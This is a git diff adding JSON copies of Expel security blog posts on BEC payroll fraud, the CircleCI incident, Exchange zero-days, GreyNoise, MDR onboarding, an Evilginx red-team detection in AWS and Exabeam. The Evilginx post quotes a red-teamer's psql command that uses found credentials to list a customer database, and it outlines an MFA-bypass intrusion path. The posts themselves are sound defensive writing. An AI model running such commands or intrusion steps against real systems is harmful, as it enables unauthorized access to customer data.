employees (if you notice your paychecks aren\u2019t correct): First, log into your payroll platform and check your paycheck. Check that the amounts are correct and are distributed to your legitimate bank accounts. Check the rules for your Outlook Inbox for any abnormal or suspicious rules you didn\u2019t set up. Click \u201cFile\u201d and then \u201cRules & Alerts\u201d to review the rules you\u2019ve implemented. If anything is incorrect, alert your security team immediately . If you get locked out of your account for an unknown reason, check your deposit information immediately when you regain access. For businesses, the impact of this likely varies based on size. A large business may have more of a safety net when it comes to resources to compensate employees that have been compromised. A smaller operation might suffer more if it boils down to lack of funds\u2014not to mention, the loss of the employee who was victimized in the first place. Our most recent quarterly threat report revealed 57% of all incidents our SOC observed were BEC attempts in O365\u2014with 24% of our customers experiencing at least one BEC attempt in O365. We\u2019re sharing this information to raise awareness on this class of fraud, help defenders spot it in the wild, and as a reminder that effective security operations is so much more than just protecting the endpoint." +} \ No newline at end of file diff --git a/emerging-threat-circleci-security-incident.json b/emerging-threat-circleci-security-incident.json new file mode 100644 index 0000000000000000000000000000000000000000..8ad6bca313a8ce9a7883842e766125750a434443 --- /dev/null +++ b/emerging-threat-circleci-security-incident.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threat: CircleCI Security Incident", + "url": "https://expel.com/blog/emerging-threat-circleci-security-incident/", + "date": "Jan 5, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threat: CircleCI Security Incident Security operations \u00b7 3 MIN READ \u00b7 JAMES JURAN AND SAM BROWN \u00b7 JAN 5, 2023 \u00b7 TAGS: MDR What happened? Expel is aware of CircleCI\u2019s reported security incident and their recommendation to rotate all credentials stored in their system. Expel uses CircleCI, so we\u2019re closely monitoring this situation for updates and we\u2019re taking action ourselves. Why does it matter? CircleCI is a CI/CD (continuous integration and continuous delivery) platform used by more than a million engineers, Expel included. CI/CD systems often contain many powerful credentials, as they are a key part of the pipeline to ship software. At this time, there is no evidence that any of Expel\u2019s credentials have been improperly used. But, based on CircleCI\u2019s announcement, we\u2019re acting out of an abundance of caution. What\u2019re we doing? The good news: we anticipated these risks and tabletopped this situation starting all the way back in 2018. As a result of our tabletop exercises and risk analyses, we already have automated daily rotation in place for our highest-risk credentials. This means that if those credentials were exfiltrated, attackers would only have 24 hours to use them before they became useless. Additionally, Expel has detection systems within our environment to trigger on use of exposed credentials. In response to this specific incident, we\u2019ve inventoried all credentials stored in CircleCI. We\u2019re rotating them as quickly as possible, and are reviewing logs of the use of those credentials for anomalous activity. What should you do right now? First: figure out if you use CircleCI in your organization. If you already work closely with your engineering team(s), you probably already know what they use for CI/CD. But, if software development is distributed throughout your organization and you don\u2019t have perfect visibility into their tooling, it may take some investigation. Pro tip: If you have a friend on your finance team, ask them if they pay a vendor named CircleCI or Circle Internet Services\u2014that might be faster than tracking down a bunch of engineering teams. If you know you use CircleCI, it\u2019s time to take action right away. First, eliminate the potential risk in your environment by rotating every credential stored in CircleCI. CircleCI has provided guidance about all the places secrets can be stored in CircleCI. For each one, go to the source of the credential, and rotate it. Exactly how you do this will depend on what it is. For example, if it\u2019s a user account in a ticketing system, change the password for that user account. If it\u2019s an API key or SSH key, disable or delete it, and make a new one. Replace the old credential in CircleCI with the new one. If you have a lot of credentials, this will take a while. You\u2019ll probably want to compile a list and split it up among multiple people. You may want to get buy-in from engineering leadership to have engineers help with this, and accept the fact this might cause some interruptions in your engineering team\u2019s work. We think that\u2019s a good tradeoff to make to protect your organization\u2019s security in this situation, based on the information available from CircleCI at this time. Once you\u2019ve rotated all your credentials, you\u2019ve achieved the first goal: eliminating the risk to your environment if your credentials were exposed. But, you also want to know if your credentials were actually used improperly. This is going to require reviewing the logs of usage of all those credentials. This is probably going to be time-consuming. You might even discover some gaps in your auditing; make notes of these to consider improving in the future. At the end of this exercise, you\u2019ll know where you stand. Hopefully you can breathe a sigh of relief that you dodged a bullet. If you uncover suspicious activity, that\u2019s your cue to begin your incident response process. What can you do longer term? CI/CD systems are a big target for attackers, because they have a lot of powerful credentials. If you want to reduce your risk from this sort of threat, two things we\u2019ve done that we recommend you consider doing are: Implement short-lived credential access and rotation workflow. We use Hashicorp Vault for this. See our blog post on using Hashicorp Vault to manage database credentials for more awesome things you can do with Hashicorp Vault to reduce your risk from long-lived credentials. Get a \u201ccanary\u201d tool and use it. Create some credentials that aren\u2019t actually used for anything and put them in any place (like your CI/CD tool) that stores credentials. Don\u2019t make it obvious that they are canary credentials, of course! Your canary tool will monitor if they are used and alert you. What next? Like we said, we\u2019re monitoring this situation closely. Keep an eye out here and on our socials ( @ExpelSecurity ) for any additional recommendations as we learn more." +} \ No newline at end of file diff --git a/emerging-threats-microsoft-exchange-on-prem-zero-days.json b/emerging-threats-microsoft-exchange-on-prem-zero-days.json new file mode 100644 index 0000000000000000000000000000000000000000..971ffd7ef295e626750a9d4e0673bfe25e8aa735 --- /dev/null +++ b/emerging-threats-microsoft-exchange-on-prem-zero-days.json @@ -0,0 +1,6 @@ +{ + "title": "Emerging Threats: Microsoft Exchange On-Prem Zero-Days", + "url": "https://expel.com/blog/emerging-threats-microsoft-exchange-on-prem-zero-days/", + "date": "Sep 30, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Emerging Threats: Microsoft Exchange On-Prem Zero-Days Security operations \u00b7 2 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 SEP 30, 2022 \u00b7 TAGS: MDR This week, Microsoft confirmed two new Exchange zero-day vulnerabilities used in attacks . Right now, there isn\u2019t a patch available for the two unique CVEs affecting Microsoft Exchange On-Premises (note that Microsoft Exchange Online customers aren\u2019t impacted): CVE-2022-41040: Server-side Request Forgery (SSRF) vulnerability. This is when an attacker tricks the server into performing actions on their behalf. CVE-2022-41082: Allows remote code execution (RCE) when PowerShell is accessible to the attacker. This can be used to gain access to the server running Microsoft Exchange. What happened? GTSC , a Vietnamese Cybersecurity coalition, reported on September 29, 2022 that it had identified the exploitation of two previously undisclosed vulnerabilities on a fully patched Exchange Server. First observed in early August of this year, the vulnerabilities were originally reported to Microsoft and the Zero Day Initiative (ZDI) that same month. However, a patch hasn\u2019t yet been released. Microsoft did acknowledge the vulnerabilities today, September 30, 2022, and assigned them CVE designations. According to Microsoft, the observed vulnerabilities have been used together in attacks against Exchange Servers, with the successful exploitation of the SSRF vulnerability allowing for the possibility of the RCE vulnerability. Both vulnerabilities require authenticated access to the target Exchange Server. What should you do? While waiting for Microsoft to issue a patch, security teams can take a few actions to mitigate risk for their organizations. We recommend: First, for any on-prem customers, teams should immediately take the steps outlined by Microsoft to block exposed Remote PowerShell ports. Next, review your Exchange configuration to determine if Outlook Web App (OWA) is exposed to the internet. If the answer is \u201cyes,\u201d then determine if it\u2019s necessary for any current business needs and evaluate the risk accordingly. (Pro tip: services like Shodan and Censys can help determine what services are publicly accessible.) If you\u2019ve had a Hybrid deployment as part of migration efforts, consider performing an additional asset inventory check to ensure on-prem Exchange servers were taken offline post-migration as appropriate. Finally, continue to monitor for additional updates from Microsoft for any new mitigation measures as the situation develops. At Expel, we\u2019re also reviewing all alerts for the past 30 days for known indicators of compromise (IOCs), reviewing alert activity for organizations running on-prem Microsoft Exchange Server, and validating detections for potential web shell delivery and activity. What does it mean for next time? When responding to zero-days, keep in mind that it\u2019s not necessarily about the patch\u2014because there isn\u2019t one. You can try and detect them, but your time is likely better spent building and detecting workflows to alert when something isn\u2019t right. Your best bet for detecting an issue before it\u2019s known publicly? Build, deploy, and continuously improve alerting for behavioral patterns that suggest something\u2019s amiss. (More on this in our annual cybersecurity trends report, Great eXpeltations 2022 .) In this specific Microsoft scenario, it\u2019s important to have endpoint visibility into on-prem Microsoft Exchange Servers, and the ability to detect suspicious Exchange and IIS Worker processes. We\u2019re continuing to monitor this evolving situation, and will keep our customers updated as new information emerges." +} \ No newline at end of file diff --git a/evaluating-greynoise-what-you-need-to-know-and-how-it.json b/evaluating-greynoise-what-you-need-to-know-and-how-it.json new file mode 100644 index 0000000000000000000000000000000000000000..e165245cb2e4ca7a0906ea250d69ee6caef93102 --- /dev/null +++ b/evaluating-greynoise-what-you-need-to-know-and-how-it.json @@ -0,0 +1,6 @@ +{ + "title": "Evaluating GreyNoise: what you need to know and how it ...", + "url": "https://expel.com/blog/evaluating-greynoise/", + "date": "Feb 26, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Evaluating GreyNoise: what you need to know and how it can help you Tips \u00b7 6 MIN READ \u00b7 DAN WHALEN AND PETER SILBERMAN \u00b7 FEB 26, 2019 \u00b7 TAGS: Get technical / How to / Selecting tech / SOC / Tools Editor\u2019s note: This is the first in a series of posts that\u2019ll tell you all about technologies we use in conjunction with Expel Workbench. At Expel, our SOC analysts get to work with lots of cool security technologies every day. Some are integrated directly into Expel Workbench \u2014 like Carbon Black , Darktrace and Duo , to name a few \u2014 because these are the products our customers already use, and we ingest activity events and alerts to monitor a customer\u2019s environment. (By the way, if you want to see a longer list of our integration partners, go check out this page .) But we also use other technologies behind the scenes to make our analysts more efficient. Ultimately, we\u2019re trying to apply technology to the alerts we pull from our integration partners so we can: 1) generate higher fidelity alerts and 2) give our analysts additional context when they\u2019re triaging an alert. When we evaluate technologies that we\u2019ll potentially integrate into Expel Workbench, we typically ask ourselves four questions: Does this product or service allow us to improve a customer\u2019s security posture? Does this technology offer new detection capabilities, improved response capabilities or provide our customers greater visibility into the work we\u2019re doing? Will this product/service provide additional context that our SOC analysts would find useful? Will it allow us to shrink the time to evaluate a class of alerts? If a technology meets any of the criteria above, then we\u2019ll take it for a test drive to see if it can provide value to Expel Workbench, our analysts and our customers. What\u2019s GreyNoise? GreyNoise has sensors all around the world that tell you what IPs are scanning the internet on a daily basis. When GreyNoise sensors detect scanning activity from an IP address, the service records the behaviors it observes from the IP along with related context about what it knows about that source. Why is this useful? This context gives you a global view of what an IP address has been up to historically (a perspective that\u2019s hard to come by otherwise). For example, threat researchers can use this data to look for spikes in scanning to identify possible new outbreaks of worms or other potential threats. Security practitioners can also use this data to filter out the noise in their network logs so they can focus their time on investigating legitimate threats actors and avoid wasting time chasing noise. Before we evaluated GreyNoise, we thought their data could help us in a couple of ways. First, we thought GreyNoise\u2019s data might help us enrich the alerts and investigative leads we generate with additional context so our SOC analysts could shrink the time it takes to triage alerts. Second, we were interested in experimenting with how we could use GreyNoise data to detect threats. Although detection isn\u2019t our primary use case for GreyNoise, we wanted to explore some ideas that could help us identify noteworthy activity at our customers. How we evaluated GreyNoise (and what we learned) In order to evaluate GreyNoise and determine whether the tool would deliver the value we thought it might, we decided to run several different experiments using the service. Greynoise offers an API free of charge to so you can test various use cases and get a better understanding of how the technology can help your security operations. This is pretty awesome \u2014 how many other vendors are offering things for free to prove their value? We used this API, to test four use cases. For each use case below, we\u2019ll describe why we explored it, how we evaluated it and what we learned. As you\u2019re reading, think about how you might create different detection cases and then how you\u2019d evaluate them for your organization. Use case #1: Improving investigative context and triage time Why we tested this use case: As a managed security provider, we\u2019re always exploring ways to make our analysts more efficient. One common pain point for security analysts everywhere is that Internet-wide scanning generates a lot of noise. Most don\u2019t require any actions. But reviewing them sucks up hours of time. We wanted to explore whether GreyNoise could help us quickly identify and filter out the noise so our analysts can focus their valuable time and energy on the alerts that matter. How we evaluated it: We took a sample of ~11,000 public IPs observed generating alerts across our customer base and requested GreyNoise context. This helped us determine how often the service would be able to tell us something valuable about an IP address. What we found: Our tests showed that GreyNoise was able to provide valuable context for 21 percent of the IP addresses we tested. This was a promising result for us! Speeding up the investigative process for a fifth of all alerts we review is a significant step in the right direction. As the GreyNoise service grows and collects more data we expect this percentage to increase. Use case #2: Detect when a customer IP address is flagged by GreyNoise Why we tested this detection: If GreyNoise identifies a customer\u2019s IP as noise, it could be a security concern. For example, a noisy customer IP might mean there\u2019s a worm infection on a customer asset, a compromised IoT device or a vulnerability on a customer asset (think reflective DoS). How we evaluated it: We collected known IP space for a few of our customers by looking up their ASNs. We downloaded the daily noise from GreyNoise and compared the results against this IP space (~74,000 IPs). What we found: We found 14 customer IP addresses that were classified as noisy by GreyNoise. When we investigated, we found evidence of anomalous outbound SMB traffic that led to a customer notification. Use case #3: Detect customer hosts communicating with suspicious IP addresses Why we tested this detection: If a customer asset is communicating with an IP flagged by GreyNoise, it could represent an actionable security concern or else give us valuable context that will speed up our investigation. How we evaluated it: We took a sample of 29,652 destination IPs observed in customer environments and ran them against the GreyNoise API to retrieve context. What we found: We found that a significant portion of security alerts observed across our customer base (~ 25 percent) were going to a \u2018noisy\u2019 IP address. When we reviewed these alerts, it was clear that the context GreyNoise provided would have accelerated our investigative process by, for example, differentiating targeted attacks from generic internet-wide scanning. Detection #4: Detect successful logins or data access sourced from internet scanners Why we tested this detection: If we saw successful logins from an IP address scanning the internet, it could indicate a user\u2019s credentials were compromised or that some services were misconfigured. For example, we\u2019ve seen organizations sometimes misconfigure cloud storage services like AWS S3 buckets or Microsoft Azure blobs. If we saw successful access to this storage from a scanner, it could indicate a misconfiguration that puts the customer\u2019s data at risk. How we evaluated it: We took a sample of 6,310 alert source IPs observed in customer environments and ran them against the GreyNoise API to retrieve context. What we found: We didn\u2019t find many instances of successful logins or data access from noisy IPs (good news!). GreyNoise provided context for ~0.5 percent of the alerts we tested. This is also encouraging from a detection perspective. Following our testing, we\u2019ve implemented rules to generate alerts when we observe a successful login or data access from a noisy IP address to highlight potentially compromised accounts or a misconfigured cloud storage service. Why we like GreyNoise When we see alerts sourced from IPs that GreyNoise classifies as \u201cnoise,\u201d it helps us accurately prioritize them as non-targeted threats. Of course, this depends on the type of activity we observe and how the IPs are tagged. GreyNoise has helped us to create new rules that eliminate noise for specific low-value events that don\u2019t represent an actionable security concern. Additionally, the context it gives our analysts during alert triage can significantly reduce analysis time. Since integrating GreyNoise in Expel Workbench last summer, Expel has used the data to more efficiently triage alerts, detect interesting activity and weed out internet noise to focus on the alerts that really matter. Moving forward, we hope to continue research into creative new use cases and leverage some new GreyNoise features (hello GreyNoise query language!) for detection and research. Big shout out to two of our interns, Chris Vantine and Brandon Dossantos for their work in helping us evaluate GreyNoise. Your executable Interested in taking GreyNoise for a test drive? There are two easy ways to get started. First, head over to the GreyNoise Visualizer and try searching for a few IP addresses as you investigate alerts throughout the day. You might find (as our analysts did) that this context reduces the time it takes to review alerts. Second, if you are looking to integrate GreyNoise context into your analysis workflow, take a look at the GreyNoise API . This is a great way to automate lookups and eliminate extra steps in your analysis process. Give these ideas a try and see how GreyNoise stacks up. We\u2019d love to hear about what you learned during your evaluation process. Drop us a note and share your thoughts." +} \ No newline at end of file diff --git a/evaluating-mdr-providers-ask-these-questions-about.json b/evaluating-mdr-providers-ask-these-questions-about.json new file mode 100644 index 0000000000000000000000000000000000000000..15aaf26e783dea26fe6067b5aede1206586a422b --- /dev/null +++ b/evaluating-mdr-providers-ask-these-questions-about.json @@ -0,0 +1,6 @@ +{ + "title": "Evaluating MDR providers? Ask these questions about ...", + "url": "https://expel.com/blog/evaluating-mdr-providers/", + "date": "Feb 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Evaluating MDR providers? Ask these questions about their onboarding process Security operations \u00b7 5 MIN READ \u00b7 LAURENCE WARRINER \u00b7 FEB 24, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Historically, managed detection and response (MDR) service providers have one major flaw that\u2019s overlooked \u2013 the level of effort required to turn on the service. In an industry where every minute counts, we don\u2019t have time to waste. Yet the onboarding process is so complicated you need project managers on both sides to manage the implementation. You have to navigate through pages and pages of complicated instructions to connect everything together. And it probably requires additional hardware, VMs with gigantic specs or another agent to deploy. The daily and weekly project status calls can last six months or longer. It\u2019s time consuming, expensive, and the level of effort is always underestimated. Sound familiar? When selecting any service provider, the initial setup, integration and activation should be an important factor in the decision-making process. Often, integrations take time and resources which lead to hidden expenses. We refuse to be that provider. Our development team vowed to make getting started with Expel as easy as joining a wireless network. The Expel Workbench\u2122 makes onboarding simple by connecting tech using APIs (not agents). Our platform has an easy-to-follow interface and provides step-by-step guides for each technology. And we\u2019re continuously improving the process to save you more time \u2013 even if it\u2019s going from 30 down to five minutes. We\u2019ve learned that you really can have an easy button that gets services up and running in a matter of minutes with very little effort. So close that project plan and re-assign the project manager. Want to say goodbye to frustrating project plans and get a return on your investment immediately? You can. Just make sure that as you\u2019re evaluating MDR providers, you ask the right questions. And also make sure you get the right answers. We often talk about how we\u2019re transparent here at Expel. This blog post is an example of that. In this post, we\u2019ll share our responses to the top questions you should ask MDR providers to help you better understand how they\u2019ll integrate with your tech and start monitoring. Can I onboard myself? Yes, please! Using the Expel Workbench, you can add, remove and edit devices whenever you wish. Although we have dedicated onboarding engineers ready to help with any support or questions, we purposely designed the Expel Workbench for easy self-onboarding. When can I start the onboarding process? Imagine you have a new TV provider. You\u2019ve agreed to start your contract with them on June 1. On June 1, they call you and ask, \u201cSo, what channels do you want? Where should we ship the box?\u201d That would be annoying, right? You want to watch TV on the day you start paying, not wait until then to start the process of getting it up and running. We strongly believe in doing everything possible to provide service from day one. That\u2019s why we give our customers all the information and access that they need well in advance. At Expel, our MDR customers receive: Step-by-step guides for each of your technologies. You can get all the details on the things you need to do on your side. Whether it\u2019s user account creation, firewall changes or amending access right, you\u2019ll find everything at support.expel.io \u2014 at any time. Expel Workbench access. We create your access accounts for the Expel Workbench so that you can start getting familiar with the interface and adding your team accounts, PagerDuty configurations, and any service desk integrations. Integration. As soon as you have Workbench access, you can start integrating your technologies. Not only does this allow you to do lean ahead work, but also allows our SOC team to start evaluating the signal, learning your environment and tuning alerts so that when we hit the switch on day one, you only get the alerts you really care about. Slack channel and support portal access. Talk to your Expel team whenever you need help. Initially, you might have questions about onboarding or navigating Workbench. Just send us a message in our portal or in Slack, and we\u2019ll be right there to help. What does the onboarding interface look like? Adding a cloud service into your Expel Workbench, like AWS CloudTrail, is simple with our automated wizard. Check out this short video to see how it works. And that\u2019s it! You\u2019re now fully onboarded and we\u2019re monitoring your environment. Can I add, edit or update integrations myself? All tech integrations are entirely in your control. You can easily add, remove and edit whenever you wish. This is not only beneficial for onboarding new techs, but we may also notify you automatically if credentials are not working or access permissions have been changed. These things can also be corrected right inside Workbench. Do you have documentation to help me do that? All of our onboarding support documentation is publicly available. We have a dedicated guide for each technology that details ( step-by-step ) the best way to configure your tech and how to add this information into your Workbench account. Having our integration guides publicly available allows Expel customers to understand any integration requirements ahead of time, so you can start planning and creating any user/API credentials in accordance with your internal change control requirements. What if I need help? We have a dedicated onboarding support team on hand to help you if you run into issues. We can help with both technical onboarding issues and can also verify the integrity of the data your tech is sending us. We also have automated health checks to ensure your device is sending us all of the glorious data our analysts love to ingest. When onboarding a new service of any kind, the process to get up and running is often an afterthought. When this happens, it causes stress and frustration for you and your team and typically starts the relationship with the vendor off on the wrong foot. It\u2019s important that you and your teams completely understand the onboarding requirements, both from a cost perspective (are there hidden costs because you need prerequisite equipment or services?) and a resource perspective. Your Expel engagement manager will make sure you understand the level of effort that\u2019s required from your teams behind the scenes. For example, how much time is needed to complete the connectivity requirements? And if the environment changes or permissions changes are needed, what are your internal change control requirements and how can your provider help to plan for these? As one of your critical partners in keeping your org safe, your MDR provider should help you understand how to best work with them and set you up for success before day one. What happens after onboarding? The Expel Workbench is designed and developed in-house with a big focus on user experience from conception. We work hard so that service activation is as simple and easy as possible. Remember: onboarding can and should be a painless process. As I mentioned, we provide simple step-by-step online guides for you to follow to configure your tech. And the output of these can easily be copied and pasted into secure fields within your Expel Workbench account. And we don\u2019t stop there. We\u2019re continually improving our integration technologies to include automated wizards between Expel Workbench and your cloud tech, making our integrations amazingly quick, easy, and seamless! Once onboarding is complete, we love getting feedback on how we can improve the experience. We invite our users to complete a quick, two-question survey after they finish onboarding. So, how\u2019s it going so far? Here\u2019s what some of our customers are saying: Want to learn more about how Expel does onboarding? Let\u2019s chat! (yes \u2013 we\u2019ll connect you with a real human. Although our bots are great conversationalists.)" +} \ No newline at end of file diff --git a/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json b/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json new file mode 100644 index 0000000000000000000000000000000000000000..76e967f2066bc8405368829e3dabf3d8b1bfe14b --- /dev/null +++ b/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json @@ -0,0 +1,6 @@ +{ + "title": "Evilginx-ing into the cloud: How we detected a red team ...", + "url": "https://expel.com/blog/evilginx-into-cloud-detected-red-team-attack-in-aws/", + "date": "Dec 1, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Evilginx-ing into the cloud: How we detected a red team attack in AWS Security operations \u00b7 6 MIN READ \u00b7 ANTHONY RANDAZZO AND BRUCE POTTER \u00b7 DEC 1, 2020 \u00b7 TAGS: Cloud security / MDR It\u2019s no secret that we\u2019re fans of red team exercises here at Expel. What we love even more, though, is when we get to detect a red team attack in AWS Cloud. Get ready to nerd out with us as we walk you through a really interesting red team exercise we recently spotted in a customer\u2019s AWS cloud environment. What is a red team engagement? First things first: Red team assessments are a great way to understand your detection and investigative capabilities, and stress test your Incident Response (IR) plan . There are also penetration tests. These are a bit different . Here\u2019s the best way to think about them, and understand the differences between the two: Penetration test: \u201cI need a pen test. This is the scope (boundaries). Tell me about all of the security holes within the scope of this assessment. In the meantime, I\u2019ll be watching our detections.\u201d Red team: \u201cThis is your target. Try to get into my environment with no help and achieve that target, while also evading my defensive measures.\u201d At Expel, we find ourselves on the receiving end of a lot of penetration tests and red team engagements \u2013 in fact, we\u2019ve even got our own playbook to help our customers plan them. (Yes, we regularly encourage our customers to put our Security Operations Center to the test.) For the duration of this blog post, we\u2019ll focus on what we\u2019ve defined as a red team engagement. Can you \u201cred team\u201d in AWS? Before the cloud was a thing, red teams had a lot of similarities: The crafty \u201cattackers\u201d phished a user with a malicious document with a backdoor, grabbed some Microsoft credentials and pressed a big flashing \u201ckeys to the kingdom\u201d button to achieve their objective. (Okay, there wasn\u2019t really a big flashing button, but sometimes it felt that way.) Fast forward to today: That model I just described is much different to execute in AWS. Most access is managed and provisioned through a third party identity and access manager (IdM/IAM) like Okta or OneLogin. An attacker would have to identify some exposed AWS access keys elsewhere or compromise a multi-factor authenticated (MFA) user in an IdM such as Okta. That\u2019s exactly what one of our customers did recently when they brought in a red team to intrude into the customer\u2019s AWS environment, causing our analysts to spring into action. Let\u2019s dive into what we uncovered during this red team exercise, what our team learned from it and how you can protect your own org from similar attacks. How we discovered a crafty phishing attempt in AWS cloud The first hint that something was wrong came in the form of one of our analysts discovering a login from an anonymous source to a customer\u2019s AWS console. We immediately sprung into action, digging in to see if that user logged in from known proxies or end points previously. Expel Workbench lead alert But wait a second. Isn\u2019t this customer\u2019s AWS access provisioned through Okta? Why didn\u2019t we get any Okta alerts? Shortly thereafter, an AmazonGuardDuty alert fired \u2013 those same access keys were being used from a python software development kit (SDK) rather than the AWS console and someone was enumerating those access key permissions. The TL;DR on all of that? Not good. We immediately escalated this as an incident to the customer to understand whether this series of events was expected. Observing the end goal of the red team That\u2019s when we learned that we were just beginning a red team exercise, so we let the red team\u2019s attack play out to see what else we\u2019d uncover. That\u2019s when things got interesting. First, we needed to understand how the red team got access to multiple AWS accounts when they were protected by Okta with MFA. Our theory was that these users were phished but we had to prove it. We dove into the Okta log data to look for anomalies. Anything that indicated something fishy (pun intended). We correlated with the DUO MFA logs and that\u2019s when we spotted some weirdness. It looked like the users\u2019 session token may have been intercepted. All of these signs pointed to a crafty open source phishing kit like Evilginx . Now that we knew how the red team got in; what were they after? After a few observed instance credential compromises and privilege escalations through role assumptions, it seemed they found what they were looking for. They made an AWS API call \u2013 StartSession \u2013 to AWS Systems Manager (the AWS equivalent to Windows SCCM). Expel Workbench AWS GuardDuty alert A few minutes later, we had a CrowdStrike Falcon EDR alert for a python backdoor. They now had sudo Linux access to that EC2 server. Expel Workbench CrowdStrike alert At this point, it was time to make the response jump to the CrowdStrike Falcon event data to see what they were up to. After perusing the file system, they found local credentials to an AWS Redshift database. This was it. The crown jewels for that business: all of their customer data. /usr/bin/perl -w /usr/bin/psql -h crownjewels.customer.com -U username -c d If this had been a real attack, we would\u2019ve immediately remediated the identified compromised Okta and AWS accounts in question. But when it comes to red team exercises, we think they\u2019re not only a great way to pressure test our SOC, but they also give us an opportunity to learn about potential ways to help a customer improve their security. Where did we get our signal to detect this attack in AWS Cloud? After a red team exercise is complete, we always go back and ask ourselves the following question: What helped us get visibility that we can alert against in the future? In this case, the security signals that helped us detect and respond to the bad behavior in AWS Cloud were: Okta System logs: These logs contain all of the Okta IdM events to include the SSO activity to third party applications like AWS. DUO logs: MFA logs allowed us to spot that something was off as we correlated these with the Okta logs. Amazon CloudTrail: This helped us track ConsoleLogins and control plane activity, which is how we got our initial lead and tracked API activity from compromised AWS access keys. Amazon GuardDuty: GuardDuty was an essential tool that helped us look for and identify bad behavior in AWS. CrowdStrike: CrowdStrike helped us identify which specific cloud instances were compromised, and also helped us spot persistence. Endpoint visibility in cloud compute is often overlooked. If we notice gaps in security signal during a red team exercise, we have a conversation with the customer to see how we can potentially help them implement more or different signals so that our team has full visibility into their environment. How to protect your own org from these types of attacks With a sophisticated red team exercise, you should have some lessons that come out of it \u2013 both for your team of analysts and for your customer. Here are our takeaways from this exercise that you can use in your own org: Protect both API access as well as your local compute resources in the cloud. Use AWS controls like Service Control Policies to restrict API access across an AWS organization \u2013 this will help you manage who can do what in your environment and where they\u2019re allowed to come from. The cloud is a double-edged sword: APIs are great because they let cloud users experiment and scale easily (they\u2019re everything everybody loves about the cloud). But API access also means that attackers can more easily do a lot of bad things at once if they make their way into your environment.Protect that access and your local compute resources by restricting access and using the tools available to you. MFA isn\u2019t your silver bullet anymore. Spoiler alert: We\u2019ve said before that MFA won\u2019t protect you from attackers. While it\u2019s still important to have, it\u2019s not enough on its own. This particular attack underscores just how easy it is for an attacker to download a pretty sophisticated, automated attack from GitHub and then unleash it on your org in an effort to bypass MFA. As automated phishing packages like this become more common, every org will need to find more ways to protect themselves from \u201cman in the middle\u201d-type attacks. Okta\u2019s adaptive multi-factor authentication is a great preventative control to layer on that can help. The industry needs better signal to detect compromised cloud users, particularly those as a result of MitM attacks\u2026 and detect it earlier in the attack sequence. There\u2019s plenty of data in the existing log data to use for behavioral detections. Microsoft does a pretty reasonable job at trying to spot these with their Azure Identity Protection service . Want to know when we share more stories about stopping evil from lurking in AWS and thwarting sophisticated phishing attacks? Subscribe to our EXE blog to get new posts sent directly to your email." +} \ No newline at end of file diff --git a/exabeam-an-incident-investigator-s-cheat-code.json b/exabeam-an-incident-investigator-s-cheat-code.json new file mode 100644 index 0000000000000000000000000000000000000000..0984ef0ac65f40c530f08855ac3b7aed9c1418a3 --- /dev/null +++ b/exabeam-an-incident-investigator-s-cheat-code.json @@ -0,0 +1,6 @@ +{ + "title": "Exabeam: an incident investigator's cheat code", + "url": "https://expel.com/blog/exabeam-incident-investigators-cheat-code/", + "date": "Feb 4, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Exabeam: an incident investigator\u2019s cheat code Security operations \u00b7 6 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 FEB 4, 2020 \u00b7 TAGS: How to / Planning / SOC / Tools If you were to ask any SOC analyst their preferred tool of the trade, just about all of them would tell you how much they love using EDR (Endpoint Detection and Response) tools. I\u2019d say the same. Seventy percent of all compromises still originate at the endpoint , and EDR tools provide the endpoint detection and recording capabilities that security analysts need to tell the story of what happened. But in many cases, telling that story is time consuming because of the abundance of data recorded by the EDR. And EDR telemetry doesn\u2019t account for all the other security signal available to analysts across the network like cloud infrastructure and apps. All that signal is important to help an analyst figure out what\u2019s going on. For example, have you ever timelined Windows event logs using Excel? Yeah, me too. It\u2019s painful. EDR tools are great at finding evil but they aren\u2019t necessarily your go-to source if you have to track a bad guy using a stolen credential across a 100K-node environment. Now, EDRs aren\u2019t perfect. They won\u2019t detect everything. This is why that defense-in-depth strategy is so critical. So how can we get some insight into all security signals in a single, intelligible view? Well, many of our customers use Exabeam for exactly this purpose. What\u2019s Exabeam? Exabeam Advanced Analytics detects threats by identifying high risk, anomalous user and entity activity. This happens by using machine learning to baseline normal activity for all users and entities in an environment. Once a baseline is available, the system automatically detects deviations compared to that baseline, the baseline of a peer group, and that of the organization as a whole\u2014and assigns that activity a risk score. Each time a rule fires, the system accumulates a risk score for that user or entity session (roughly one day of activity). Once the risk score reaches a threshold, you\u2019ll get a Notable User alert. From the alert, you can investigate the user\u2019s session which contains all of the recorded events and triggered rules. Anomaly detection is often synonymous with snake oil in the security marketplace. Boy, was I wrong in this case. Exabeam stitches together all of our defense-in-depth security signals to provide a comprehensive view of what happened. Here are some examples of how Expel uses this insight to tell us things we didn\u2019t know and possibly wouldn\u2019t have known without a tool like Exabeam. Quick and dirty incident timelining when you need answers fast When we identify a security incident, it\u2019s often a time consuming effort to collect all of the data necessary to put together a comprehensive timeline (Windows Event Logs, EDR events, authentication logs, etc.). To be honest, we\u2019re going to do it anyway to ensure we don\u2019t miss anything. But we also strive to provide answers to our customers as quickly as possible. For example, Expel recently responded to an incident where an attacker was already on an endpoint. The attacker attempted to escalate privileges with PowerSploit. The customer\u2019s EDR alerted on this activity but not the initial compromise. With this incident, we\u2019d ask the following general investigative questions and expand from here: What did the attacker do on this host? Did the attacker move laterally to any other hosts? Did the attacker have access to any other accounts? How did the attacker get into this environment? Traditional response scoping requires us to collect, parse, and review the EDR events and Windows Event Logs (assuming it\u2019s a Windows compromise), and then pivot to other data sources once new leads are identified. Or we can simply review the user or entity timeline in Exabeam. Thanks to Exabeam, we\u2019re already able to identify that the attacker gained initial access to the environment with compromised credentials through the Citrix Netscaler VPN. Fortunately for us responders, the user had little activity in the session so we easily attributed all of this activity back to the attacker. The authorized user wasn\u2019t on the network at the time to inject authorized user activity into the timeline. Moving down the timeline, we see the attacker accessed the published VDI from which we\u2019d received the original EDR alert. We also have the 